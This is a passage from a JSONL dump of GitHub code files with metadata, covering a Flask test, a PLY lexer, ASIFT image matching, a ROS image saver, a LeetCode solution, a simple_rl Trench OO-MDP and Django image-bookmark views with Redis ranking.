s\n\n","repo_name":"tienthanhtk115/My-odoo-module","sub_path":"calendar_exp/wizard/export_calendar.py","file_name":"export_calendar.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"71636255257","text":"# project/server/tests/test_main.py\n\n\nimport unittest\n\nfrom base import BaseTestCase\n\n\nclass TestMainBlueprint(BaseTestCase):\n\n def test_index(self):\n # Ensure Flask is setup.\n response = self.client.get('/', follow_redirects=True)\n self.assertEqual(response.status_code, 200)\n self.assertIn(b'Historical Rates', response.data)\n\n def test_404(self):\n # Ensure 404 error is handled.\n response = self.client.get('/404')\n self.assert404(response)\n self.assertTemplateUsed('errors/404.html')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pybites/challenges","sub_path":"28/mjhea0/project/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":683,"dataset":"github-code","pt":"68"} +{"seq_id":"71431304218","text":"## Imports\n\n#Importing Lex and Yacc from the ply module\n\nimport ply.lex as lex\nimport sajilo.exceptions\n\n\n# Tokens \n''' \nToken are defined here to make it easier to reuse the values later\nReserved keywords need to be done separately\n'''\n\nkeywords = {\n # Reserved keywords, Always required\n ## Needs refactoring. Never do this way.\n 'yedi': 'IF',\n 'navaye': 'ELSE',\n\n 'loop': 'FOR',\n 'lai': 'IN',\n 'jaba': 'WHILE',\n 'anta': 'EXIT',\n\n 'vidhi': 'FUNCTION',\n 'pathau': 'RETURN',\n\n 'lekha': 'PRINT',\n\n 'ra': 'AND',\n 'athawa': 'OR',\n 'haina': 'NOT',\n}\n\ntokens = [\n 'KEYWORD',\n 'STMT_END',\n 'EQUALS',\n 'IDENTIFIER',\n 'NUM_INT',\n 'NUM_FLOAT',\n 'LPAREN',\n 'RPAREN',\n 'LBRACK',\n 'RBRACK',\n 'COMMA',\n 'STRING',\n 'NEWLINE',\n 'LSQBRACK',\n 'RSQBRACK',\n 'COLON',\n 'QUESTION_MARK',\n\n 'PLUS',\n 'EXP',\n 'MINUS',\n 'MUL',\n 'DIV',\n 'MOD',\n\n 'LSHIFT',\n 'RSHIFT',\n 'BIT_AND',\n 'BIT_OR',\n 'BIT_XOR',\n 'BIT_NEG',\n\n 'DOUBLE_PLUS',\n 'DOUBLE_MINUS',\n\n 'PLUS_EQ',\n 'MINUS_EQ',\n 'MUL_EQ',\n 'DIV_EQ',\n 'MOD_EQ',\n 'EXP_EQ',\n\n\n 'TRUE',\n 'FALSE',\n\n 'EQ',\n 'NEQ',\n 'GT',\n 'GTE',\n 'LT',\n 'LTE',\n\n 'ARROW_LTR',\n 'ARROW_RTL'\n] + list(keywords.values())\n\nt_COMMA = ','\nt_PLUS = r'\\+'\nt_EXP = r'\\*\\*'\nt_MINUS = '-'\nt_MUL = r'\\*'\nt_DIV = r'/'\nt_MOD = '%'\nt_STMT_END = ';'\nt_QUESTION_MARK = r'\\?'\nt_EQUALS = '='\nt_ignore_WS = r'\\s+'\nt_COLON = ':'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LBRACK = '{'\nt_RBRACK = '}'\nt_LSQBRACK = r'\\['\nt_RSQBRACK = r'\\]'\nt_EQ = '=='\nt_NEQ = '!='\nt_GT = '>'\nt_GTE = '>='\nt_LT = '<'\nt_LTE = '<='\nt_ARROW_LTR = '->'\nt_ARROW_RTL = '<-'\nt_ignore_COMMENTS = r'//.+'\nt_PLUS_EQ = r'\\+='\nt_MINUS_EQ = r'-='\nt_MUL_EQ = r'\\*='\nt_DIV_EQ = r'/='\nt_MOD_EQ = '%='\nt_EXP_EQ = '\\*\\*='\n\nt_RSHIFT = '>>'\nt_LSHIFT = '<<'\nt_BIT_AND = r'\\&'\nt_BIT_OR = r'\\|'\nt_BIT_XOR = r'\\^'\nt_BIT_NEG = r'~'\n\nt_DOUBLE_PLUS = r'\\+\\+'\nt_DOUBLE_MINUS = '--'\n\n\ndef t_NEWLINE(t):\n r'\\n'\n t.lexer.lineno += 1\n t.lexer.linepos = 0\n pass\n\n\ndef t_TRUE(t):\n 'true'\n t.value = True\n return t\n\n\ndef t_FALSE(t):\n 'false'\n t.value = False\n return t\n\n\ndef t_IDENTIFIER(t):\n r'[\\$_a-zA-Z]\\w*'\n\n t.type = keywords.get(t.value, t.type)\n\n return t\n\n\ndef t_NUM_FLOAT(t):\n r'\\d*\\.\\d+'\n t.value = float(t.value)\n return t\n\n\ndef t_NUM_INT(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\ndef t_STRING(t):\n r'\"(?:\\\\\"|.)*?\"'\n t.value = bytes(t.value.lstrip('\"').rstrip('\"'), \"utf-8\").decode(\"unicode_escape\")\n return t\n\n\ndef t_error(t):\n raise sajilo.exceptions.UnexpectedCharacter(\"Unexpected character '%s' at line %d\" % (t.value[0], t.lineno))\n\n#Build the lexer\nlexer = lex.lex()","repo_name":"theanilbhattarai/sajilo-alpha-final","sub_path":"sajilo/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"41519616523","text":"from common import *\nimport heapq\n\n\nclass ImagePairAsiftMatches:\n def __init__(self):\n self.asift_feature_matchings = []\n\n def add_match(self, kpts1, kpts2, matches):\n self.asift_feature_matchings.append((kpts1, kpts2, matches))\n\n def getAll(self):\n kp1_all = []\n kp2_all = []\n matches_all = []\n kp1_next = 0\n kp2_next = 0\n for i in range(0, len(self.asift_feature_matchings)):\n for match in self.asift_feature_matchings[i][2]:\n kp1_all.append(self.asift_feature_matchings[i][0][match.queryIdx])\n match.queryIdx = kp1_next\n kp1_next += 1\n kp2_all.append(self.asift_feature_matchings[i][1][match.trainIdx])\n match.trainIdx = kp2_next\n kp2_next += 1\n matches_all.append(match)\n return kp1_all, kp2_all, matches_all\n\n\nclass SingleViewpointAsiftFeatures:\n def __init__(self, tilt, phi, sift_points, sift_desc):\n self.tilt = tilt\n self.phi = phi\n self.sift_points = sift_points\n self.sift_desc = sift_desc\n\n def __init__(self, tilt, phi):\n self.tilt = tilt\n self.phi = phi\n self.sift_points = []\n self.sift_desc = []\n\n def normalize(self, rotmat, tiltmat):\n constant = np.array([[0, 0, 1]])\n affinemat = np.matmul(np.concatenate([tiltmat, constant]), np.concatenate([rotmat, constant]))[:-1]\n inversemat = cv.invertAffineTransform(affinemat)\n self._inverse_tilt_rot(inversemat)\n\n def _inverse_tilt_rot(self, inversewmat):\n # 2 by 3 mat\n change = inversewmat[:, :-1]\n translation = inversewmat[:, -1].reshape((2, 1))\n for point in self.sift_points:\n coord = np.array(point.pt).reshape((2, 1))\n coord = np.matmul(change, coord)\n coord += translation\n coord.astype(np.int32)\n point.pt = (coord[0, 0], coord[1, 0])\n\n\ndef affine_detect_compute(img, phi, tilt, corners=None):\n # return SingleViewpointAsiftFeatures insstance\n detector = cv.xfeatures2d_SIFT.create()\n keypoint = SingleViewpointAsiftFeatures(tilt, phi)\n rot_img, rot_mat, rot_corners = rotation_phi(img, phi, corners)\n tilt_img, tilt_mat, tilt_corners = tilt_image(rot_img, tilt, rot_corners)\n keypoint.sift_points, keypoint.sift_desc = \\\n detector.detectAndCompute(tilt_img, mask_of(tilt_img.shape[0], tilt_img.shape[1], tilt_corners))\n keypoint.normalize(rot_mat, tilt_mat)\n return keypoint\n\n\ndef detect_compute(img, content_corners=None, sigma_t=2 ** 0.5, n=5, b=72, draw=None):\n # asift keypoints\n if content_corners is None:\n content_corners = default_corners(img)\n detector = cv.xfeatures2d_SIFT.create()\n features = []\n first = SingleViewpointAsiftFeatures(1, 0)\n first.sift_points, first.sift_desc = detector. \\\n detectAndCompute(img, mask_of(img.shape[0], img.shape[1], content_corners))\n features.append(first)\n for i in range(1, n + 1):\n tilt = sigma_t ** i\n k = 0\n phi = k * b / tilt\n while phi < 180:\n keypoint = affine_detect_compute(img, phi, tilt, content_corners)\n features.append(keypoint)\n # update phi\n k += 1\n phi = k * b / tilt\n if draw is not None:\n all_keypoints = []\n for asift_point in features:\n all_keypoints += asift_point.sift_points\n empty = np.empty((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n cv.drawKeypoints(img, all_keypoints, empty)\n cv.imwrite(draw, empty)\n print(\"Detect complete !\")\n return features\n\n\ndef two_resolution_match(img1, img2, corners1=None, corners2=None, draw=None, scale=1 / 3, n_affine=5,\n match_result=None):\n ratio_thresh = 0.7\n if corners1 is None:\n corners1 = default_corners(img1)\n if corners2 is None:\n corners2 = default_corners(img2)\n corners1_ds = np.int32(corners1 * scale)\n corners2_ds = np.int32(corners2 * scale)\n img1_ds = cv.resize(img1, (0, 0), fx=scale, fy=scale)\n img2_ds = cv.resize(img2, (0, 0), fx=scale, fy=scale)\n img1_ds_features = detect_compute(img1_ds, corners1_ds)\n img2_ds_features = detect_compute(img2_ds, corners2_ds)\n matcher = cv.DescriptorMatcher_create(cv.DescriptorMatcher_FLANNBASED)\n affine_pairs = []\n for ds_feature1 in img1_ds_features:\n for ds_feature2 in img2_ds_features:\n raw_matches = matcher.knnMatch(ds_feature1.sift_desc, ds_feature2.sift_desc, 2)\n good_matches = []\n for m, n in raw_matches:\n if m.distance < ratio_thresh * n.distance:\n good_matches.append(m)\n affine_pairs.append({'length': len(good_matches), 'affine1': (ds_feature1.phi, ds_feature1.tilt),\n 'affine2': (ds_feature2.phi, ds_feature2.tilt)})\n good_affines = heapq.nlargest(n_affine, affine_pairs, key=lambda item: item['length'])\n all_matche_tupels = ImagePairAsiftMatches()\n print('Low resolution complete !')\n for affine in good_affines:\n points1, points2, matches = affine_feature_match(img1, img2, affine['affine1'], affine['affine2'], corners1,\n corners2)\n all_matche_tupels.add_match(points1, points2, matches)\n img1_left_points, img2_left_points, all_matches = all_matche_tupels.getAll()\n match_filtering(img1_left_points, img2_left_points, all_matches)\n if draw is not None:\n draw_match(img1, img1_left_points, img2, img2_left_points, all_matches, draw)\n if match_result is not None:\n match_result.append((img1_left_points, img2_left_points, all_matches))\n corresponding1 = []\n corresponding2 = []\n for match in all_matches:\n corresponding1.append(img1_left_points[match.queryIdx].pt)\n corresponding2.append(img2_left_points[match.trainIdx].pt)\n corresponding1 = np.float32(corresponding1).reshape(-1, 1, 2)\n corresponding2 = np.float32(corresponding2).reshape(-1, 1, 2)\n return corresponding1, corresponding2\n\n\ndef affine_feature_match(img1, img2, affine1, affine2, corners1=None, corners2=None):\n ratio_thresh = 0.7\n if corners1 is None:\n corners1 = default_corners(img1)\n if corners2 is None:\n corners2 = default_corners(img2)\n img1feature = affine_detect_compute(img1, affine1[0], affine1[1], corners1)\n img2feature = affine_detect_compute(img2, affine2[0], affine2[1], corners2)\n matcher = cv.DescriptorMatcher_create(cv.DescriptorMatcher_FLANNBASED)\n raw_matches = matcher.knnMatch(img1feature.sift_desc, img2feature.sift_desc, 2)\n good_matches = []\n for m, n in raw_matches:\n if m.distance < ratio_thresh * n.distance:\n good_matches.append(m)\n return img1feature.sift_points, img2feature.sift_points, good_matches\n\n\ndef feature_match(img1, img2, corners1=None, corners2=None, img1_features=None, img2_features=None, draw=None):\n ratio_thresh = 0.7\n if img1_features is None:\n img1_features = detect_compute(img1, corners1)\n if img2_features is None:\n img2_features = detect_compute(img2, corners2)\n matcher = cv.DescriptorMatcher_create(cv.DescriptorMatcher_FLANNBASED)\n all_matche_tupels = ImagePairAsiftMatches()\n turn = 0\n for img1feature in img1_features:\n for img2feature in img2_features:\n raw_matches = matcher.knnMatch(img1feature.sift_desc, img2feature.sift_desc, 2)\n turn += 1\n if turn % 20 == 0:\n print('asift match: ' + str(turn))\n good_matches = []\n # ratio test\n for m, n in raw_matches:\n if m.distance < ratio_thresh * n.distance:\n good_matches.append(m)\n all_matche_tupels.add_match(img1feature.sift_points, img2feature.sift_points, good_matches)\n img1_left_points, img2_left_points, all_matches = all_matche_tupels.getAll()\n match_filtering(img1_left_points, img2_left_points, all_matches)\n if draw is not None:\n draw_match(img1, img1_left_points, img2, img2_left_points, all_matches, draw)\n corresponding1 = []\n corresponding2 = []\n for match in all_matches:\n corresponding1.append(img1_left_points[match.queryIdx])\n corresponding2.append(img2_left_points[match.trainIdx])\n return corresponding1, corresponding2\n\n\ndef match_filtering(kpts1, kpts2, matches):\n print(\"left matches: \" + str(len(matches)))\n distance = lambda pt1, pt2: abs(pt1.pt[0] - pt2.pt[0]) + abs(pt1.pt[1] - pt2.pt[1])\n isMultiple = lambda pt1, pt2: pt1.pt[0] - pt2.pt[0] >= 2 or pt1.pt[1] - pt2.pt[1] >= 2\n # remove identical matches\n idx1 = 0\n while idx1 < len(matches):\n if idx1 % 100 == 0:\n print('identical filtering: ' + str(idx1))\n remove_idx = []\n end1point1 = kpts1[matches[idx1].queryIdx]\n end2point1 = kpts2[matches[idx1].trainIdx]\n for idx2 in range(idx1 + 1, len(matches)):\n end1point2 = kpts1[matches[idx2].queryIdx]\n end2point2 = kpts2[matches[idx2].trainIdx]\n if distance(end1point1, end1point2) < 2 and distance(end2point1, end2point2) < 2:\n remove_idx.append(idx2)\n pop_num = 0\n for idx in remove_idx:\n matches.pop(idx - pop_num)\n pop_num += 1\n idx1 += 1\n print(\"left matches: \" + str(len(matches)))\n # remove one to multiple matches\n idx1 = 0\n while idx1 < len(matches):\n if idx1 % 100 == 0:\n print('multiple filtering: ' + str(idx1))\n remove_first = False\n remove_idx = []\n end1point1 = kpts1[matches[idx1].queryIdx]\n end2point1 = kpts2[matches[idx1].trainIdx]\n for idx2 in range(idx1 + 1, len(matches)):\n end1point2 = kpts1[matches[idx2].queryIdx]\n end2point2 = kpts2[matches[idx2].trainIdx]\n if distance(end1point1, end1point2) < 2 and isMultiple(end2point1, end2point2):\n remove_first = True\n remove_idx.append(idx2)\n if remove_first:\n matches.pop(idx1)\n pop_num = 1\n else:\n idx1 += 1\n pop_num = 0\n for idx in remove_idx:\n matches.pop(idx - pop_num)\n pop_num += 1\n print(\"left matches: \" + str(len(matches)))\n\n\nif __name__ == '__main__':\n import os\n\n # test pair\n location = os.path.join(data_dir, 'Image', 'Cross-19-2019-11.png')\n location = cv.imread(location)\n map_img = os.path.join(data_dir, 'Image', 'BUAA-19-2019-11.png')\n map_img = cv.imread(map_img)\n augmented, corners = data_augment(location, expr_base)\n two_resolution_match(augmented, map_img, corners1=corners, draw=os.path.join(expr_base, 'fastmatch.png'))\n feature_match(augmented, map_img, corners1=corners, draw=os.path.join(expr_base, 'match.png'))\n","repo_name":"PatrickZad/AerialVisualGeoloc","sub_path":"asiftmatch.py","file_name":"asiftmatch.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28726024948","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport cv2\nimport rospy\nfrom sensor_msgs.msg import Image\n\nimg=np.array([[0,0,0]], np.uint8)\n\nrospy.init_node('training', anonymous=True)\n\nc=0\nnumimg = 0\n\ndef perception(data):\n global img, c, numimg\n c+=1\n if c==20:\n numimg +=1\n img = np.array(list(data.data), np.uint8)\n img = np.resize(img, (data.height, data.width, 3))\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imwrite(str(numimg)+\".jpg\", img)\n print(\"images/\"+str(numimg)+\".jpg\")\n c=0\n\ncommandListener = rospy.Subscriber(\"/camera/color/image_raw\", Image, perception)\n\nprint(\"Start training.py\")\nrospy.spin()","repo_name":"maximebohrer/larm_moutarde","sub_path":"grp-moutarde/scripts/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30995241697","text":"class Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n m=len(grid)\n n=len(grid[0])\n queue=collections.deque()\n drow=[-1, 0, 1, 0]\n dcol=[0, 1, 0, -1]\n days=0\n cnt=0\n tot=0\n\n for i in range(0, m):\n for j in range(0, n):\n if grid[i][j]==2:\n queue.append((i, j))\n if grid[i][j]!=0:\n tot+=1\n \n while queue:\n size=len(queue)\n cnt+=size\n while size:\n tup=queue.popleft()\n for i in range(0, 4):\n nrow=drow[i]+tup[0]\n ncol=dcol[i]+tup[1]\n if self.valid(nrow, ncol, grid, m, n):\n grid[nrow][ncol]=2\n queue.append((nrow, ncol))\n size-=1\n\n if len(queue)!=0:\n days+=1\n if tot==cnt:\n return days\n return -1\n\n def valid(self, row, col, grid, m, n):\n if row<0 or col<0 or row>=m or col>=n or grid[row][col]!=1:\n return False\n return True","repo_name":"sourabpramanik/Leetcode","sub_path":"problems/rotting_oranges/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"17278237617","text":"from collections import Counter\nparticipant = [\"leo\", \"kiki\", \"eden\"]\ncompletion = [\"eden\", \"kiki\"]\n\n\nparticipant = dict(Counter(participant))\ncompletion = dict(Counter(completion))\n\nfor key, value in participant.items():\n try: \n if value != completion[key]:\n print(key)\n except:\n print(key) \n\n\n\ndict1 = Counter([1,1,1,1,2,2,2,3,3])\ndict2 = Counter([1,1,1,1])\n# Counter끼리 먼저 빼고 나중에 dict()\nprint(dict(dict1 - dict2)) # {2: 3, 3: 2} ","repo_name":"selimssy/algorithm","sub_path":"Desktop/algorithm/p1/완주하지 못한 선수.py","file_name":"완주하지 못한 선수.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34809879458","text":"import copy\nimport random\n\nfrom simple_rl.agents import QLearningAgent\nfrom simple_rl.agents import RandomAgent\nfrom simple_rl.mdp import OOMDP\nfrom simple_rl.mdp.oomdp.OOMDPObjectClass import OOMDPObject\nfrom simple_rl.planning import ValueIteration\nfrom simple_rl.run_experiments import run_agents_on_mdp\nfrom simple_rl.tasks.trench.TrenchOOMDPState import TrenchOOMDPState\n\n\nclass TrenchOOMDP(OOMDP):\n ''' Class for a Trench OO-MDP '''\n\n # Static constants.\n ACTIONS = [\"forward\", \"rotate_right\", \"rotate_left\", \"pickup\", \"place\"]\n ATTRIBUTES = [\"x\", \"y\", \"dx\", \"dy\", \"has_block\", \"dest_x\", \"dest_y\"]\n CLASSES = [\"agent\", \"block\", \"lava\"]\n\n def __init__(self, width, height, agent, blocks, lavas, gamma=0.99, slip_prob=0.0, name=\"trench\"):\n self.height = height\n self.width = width\n self.name = name\n\n agent_obj = OOMDPObject(attributes=agent, name=\"agent\")\n block_objs = self._make_oomdp_objs_from_list_of_dict(blocks, \"block\")\n lava_objs = self._make_oomdp_objs_from_list_of_dict(lavas, \"lava\")\n\n init_state = self._create_state(agent_obj, block_objs, lava_objs)\n OOMDP.__init__(self, TrenchOOMDP.ACTIONS, self._trench_transition_func, self._trench_reward_func, init_state=init_state, gamma=gamma)\n self.slip_prob = slip_prob\n\n def _create_state(self, agent_oo_obj, blocks, lavas):\n '''\n Args:\n agent_oo_obj (OOMDPObjects)\n blocks (list of OOMDPObject)\n lavas (list of OOMDPObject)\n\n Returns:\n (OOMDP State)\n '''\n\n objects = {c : [] for c in TrenchOOMDP.CLASSES}\n\n objects[\"agent\"].append(agent_oo_obj)\n\n # Make walls.\n for b in blocks:\n objects[\"block\"].append(b)\n\n # Make passengers.\n for l in lavas:\n objects[\"lava\"].append(l)\n\n return TrenchOOMDPState(objects)\n\n def _trench_reward_func(self, state, action, next_state=None):\n '''\n Args:\n state (State)\n action (str)\n next_state (State)\n\n Returns\n (float)\n '''\n\n if self._is_goal_state_action(state, action):\n return 10.0\n elif (int(next_state.x), int(next_state.y)) in self.lava_locs:\n return -1.0\n else:\n return 0\n\n def _is_goal_state_action(self, state, action):\n if action == \"forward\":\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n if next_x == agent.get_attribute(\"dest_x\") and next_y == agent.get_attribute(\"dest_y\"):\n return True\n else:\n return False\n return False\n\n def _is_lava_state_action(self, state, action):\n if action == \"forward\":\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n for l in state.get_objects_of_class(\"lava\"):\n if next_x == l.get_attribute(\"x\") and next_y == l.get_attribute(\"y\"):\n return True\n return False\n\n def _is_goal_state(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\")\n next_y = agent.get_attribute(\"y\")\n if next_x == agent.get_attribute(\"dest_x\") and next_y == agent.get_attribute(\"dest_y\"):\n return True\n else:\n return False\n\n def _is_lava_state(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\")\n next_y = agent.get_attribute(\"y\")\n for l in state.get_objects_of_class(\"lava\"):\n if next_x == l.get_attribute(\"x\") and next_y == l.get_attribute(\"y\"):\n return True\n return False\n\n def _trench_transition_func(self, state, action):\n '''\n Args:\n state (State)\n action (str)\n\n Returns\n (State)\n '''\n if state.is_terminal():\n return state\n\n r = random.random()\n\n if self.slip_prob > r:\n # Flip dir.\n if action == \"forward\":\n action = random.choice([\"rotate_left\", \"rotate_right\", \"place\"])\n elif action == \"rotate_left\":\n action = random.choice([\"forward\", \"rotate_right\", \"place\"])\n elif action == \"rotate_right\":\n action = random.choice([\"forward\", \"rotate_left\", \"place\"])\n\n forward_state_in_bounds = self._forward_state_in_bounds(state)\n is_forward_loc_block = self._is_forward_loc_block(state)\n if action == \"forward\" and forward_state_in_bounds and not is_forward_loc_block:\n next_state = self.move_agent_forward(state)\n elif action == \"rotate_left\":\n next_state = self.rotate_agent_left(state)\n elif action == \"rotate_right\":\n next_state = self.rotate_agent_right(state)\n elif action == \"pickup\" and is_forward_loc_block:\n next_state = self.agent_pickup(state)\n elif action == \"place\" and state.get_first_obj_of_class(\"agent\").get_attribute(\"has_block\") and \\\n forward_state_in_bounds and not is_forward_loc_block:\n next_state = self.agent_place(state)\n else:\n next_state = state\n\n if self._is_terminal_state(next_state):\n next_state.set_terminal(True)\n\n # All OOMDP states must be updated.\n next_state.update()\n\n return next_state\n\n def _is_terminal_state(self, state):\n return self._is_goal_state(state) or self._is_lava_state(state)\n\n def _is_forward_loc_block(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n for b in state.get_objects_of_class(\"block\"):\n if next_x == b[\"x\"] and next_y == b[\"y\"]:\n return True\n return False\n\n def _forward_state_in_bounds(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n x_check = 1 <= next_x <= self.width\n y_check = 1 <= next_y <= self.height\n return x_check and y_check\n\n def move_agent_forward(self, state):\n next_state = copy.deepcopy(state)\n\n agent_att = next_state.get_first_obj_of_class(\"agent\").get_attributes()\n agent_att[\"x\"] += agent_att[\"dx\"]\n agent_att[\"y\"] += agent_att[\"dy\"]\n\n return next_state\n\n def rotate_agent_left(self, state):\n next_state = copy.deepcopy(state)\n\n agent_att = next_state.get_first_obj_of_class(\"agent\").get_attributes()\n curr_dir = (agent_att[\"dx\"], agent_att[\"dy\"])\n\n dir_updates = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n agent_att[\"dx\"], agent_att[\"dy\"] = dir_updates[(dir_updates.index(curr_dir) + 1) % len(dir_updates)]\n return next_state\n\n def rotate_agent_right(self, state):\n next_state = copy.deepcopy(state)\n\n agent_att = next_state.get_first_obj_of_class(\"agent\").get_attributes()\n curr_dir = (agent_att[\"dx\"], agent_att[\"dy\"])\n\n dir_updates = [(0, -1), (-1, 0), (0, 1), (1, 0)]\n agent_att[\"dx\"], agent_att[\"dy\"] = dir_updates[(dir_updates.index(curr_dir) + 1) % len(dir_updates)]\n return next_state\n\n def agent_pickup(self, state):\n next_state = copy.deepcopy(state)\n\n agent = next_state.get_first_obj_of_class(\"agent\")\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n agent.set_attribute(\"has_block\", 1)\n block_remove = 0\n for b in next_state.get_objects_of_class(\"block\"):\n if next_x == b[\"x\"] and next_y == b[\"y\"]:\n break\n block_remove += 1\n next_state.get_objects_of_class(\"block\").pop(block_remove)\n return next_state\n\n def agent_place(self, state):\n next_state = copy.deepcopy(state)\n\n agent = next_state.get_first_obj_of_class(\"agent\")\n\n agent.set_attribute(\"has_block\", 0)\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n if self._is_lava_state_action(next_state, \"forward\"):\n lava_remove = 0\n for l in next_state.get_objects_of_class(\"lava\"):\n if next_x == l.get_attribute(\"x\") and next_y == l.get_attribute(\"y\"):\n break\n lava_remove += 1\n\n next_state.get_objects_of_class(\"lava\").pop(lava_remove)\n else:\n new_block = {\"x\": next_x, \"y\": next_y}\n new_block_obj = self._make_oomdp_objs_from_list_of_dict([new_block], \"block\")\n next_state.get_objects_of_class(\"block\").append(new_block_obj[0])\n\n return next_state\n\n def __str__(self):\n prefix = self.name\n return prefix + \"_h-\" + str(self.height) + \"_w-\" + str(self.width)\n\n\ndef main():\n # Setup MDP, Agents.\n size = 5\n agent = {\"x\": 1, \"y\": 1, \"dx\": 1, \"dy\": 0, \"dest_x\": size, \"dest_y\": size, \"has_block\": 0}\n blocks = [{\"x\": size, \"y\": 1}]\n lavas = [{\"x\": x, \"y\": y} for x, y in map(lambda z: (z + 1, (size + 1) / 2), range(size))]\n\n mdp = TrenchOOMDP(size, size, agent, blocks, lavas)\n ql_agent = QLearningAgent(actions=mdp.get_actions())\n rand_agent = RandomAgent(actions=mdp.get_actions())\n\n # Run experiment and make plot.\n run_agents_on_mdp([ql_agent, rand_agent], mdp, instances=30, episodes=250, steps=250)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"david-abel/simple_rl","sub_path":"simple_rl/tasks/trench/TrenchOOMDPClass.py","file_name":"TrenchOOMDPClass.py","file_ext":"py","file_size_in_byte":9995,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"68"} +{"seq_id":"934362520","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.conf import settings\nimport redis\n\nfrom .forms import ImageCreateFrom\nfrom .models import Image\nfrom actions.utils import create_action\n\n# connect to Redis\nr = redis.Redis(\n host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n db=settings.REDIS_DB,\n)\n\n\n@login_required\ndef image_create(req):\n if req.method == \"POST\":\n form = ImageCreateFrom(data=req.POST)\n if form.is_valid():\n cd = form.cleaned_data\n new_image = form.save(commit=False)\n\n new_image.user = req.user\n new_image.save()\n create_action(req.user, \"bookmarked image\", new_image)\n messages.success(req, \"Image added successfully\")\n\n return redirect(new_image.get_absolute_url())\n\n else:\n form = ImageCreateFrom(data=req.GET)\n\n return render(req, \"images/image/create.html\", {\"section\": \"images\", \"form\": form})\n\n\ndef image_detail(req, id, slug):\n image = get_object_or_404(Image, id=id, slug=slug)\n\n # increment total image views by 1\n total_views = r.incr(f\"image:{image.id}:views\")\n # increment image ranking by 1\n r.zincrby(\"image_ranking\", 1, image.id)\n\n return render(\n req,\n \"images/image/detail.html\",\n {\n \"section\": \"images\",\n \"image\": image,\n \"total_views\": total_views,\n },\n )\n\n\n@login_required\n@require_POST\ndef image_like(req):\n image_id = req.POST.get(\"id\")\n action = req.POST.get(\"action\")\n\n if image_id and action:\n try:\n image = Image.objects.get(id=image_id)\n if action == \"like\":\n image.users_like.add(req.user)\n create_action(req.user, \"likes\", image)\n else:\n image.users_like.remove(req.user)\n\n return JsonResponse({\"status\": \"ok\"})\n\n except Image.DoesNotExist:\n pass\n\n return JsonResponse({\"status\": \"error\"})\n\n\n@login_required\ndef image_list(req):\n images = Image.objects.all()\n paginator = Paginator(images, 8)\n page = req.GET.get(\"page\")\n images_only = req.GET.get(\"images_only\")\n\n try:\n images = paginator.page(page)\n except PageNotAnInteger:\n # if page is not an integer, deliver the first page\n images = paginator.page(1)\n except EmptyPage:\n if images_only:\n # if ajax request and page out of range return an empty page\n return HttpResponse(\"\")\n\n # if page out of range return last page of results\n images = paginator.page(paginator.num_pages)\n\n if images_only:\n return render(\n req,\n \"images/image/list_images.html\",\n {\"section\": \"images\", \"images\": images},\n )\n\n return render(\n req,\n \"images/image/list.html\",\n {\"section\": \"images\", \"images\": images},\n )\n\n\n@login_required\ndef image_ranking(req):\n # get image ranking dict from Redis\n img_ranking = r.zrange(\"image_ranking\", 0, -1, desc=True)[:10]\n img_ranking_ids = [int(id) for id in img_ranking]\n\n # get most viewed images\n most_viewed = list(Image.objects.filter(id__in=img_ranking_ids))\n most_viewed.sort(key=lambda x: img_ranking_ids.index(x.id))\n\n return render(\n req,\n \"images/image/ranking.html\",\n {\n \"section\": \"images\",\n \"most_viewed\": most_viewed,\n },\n 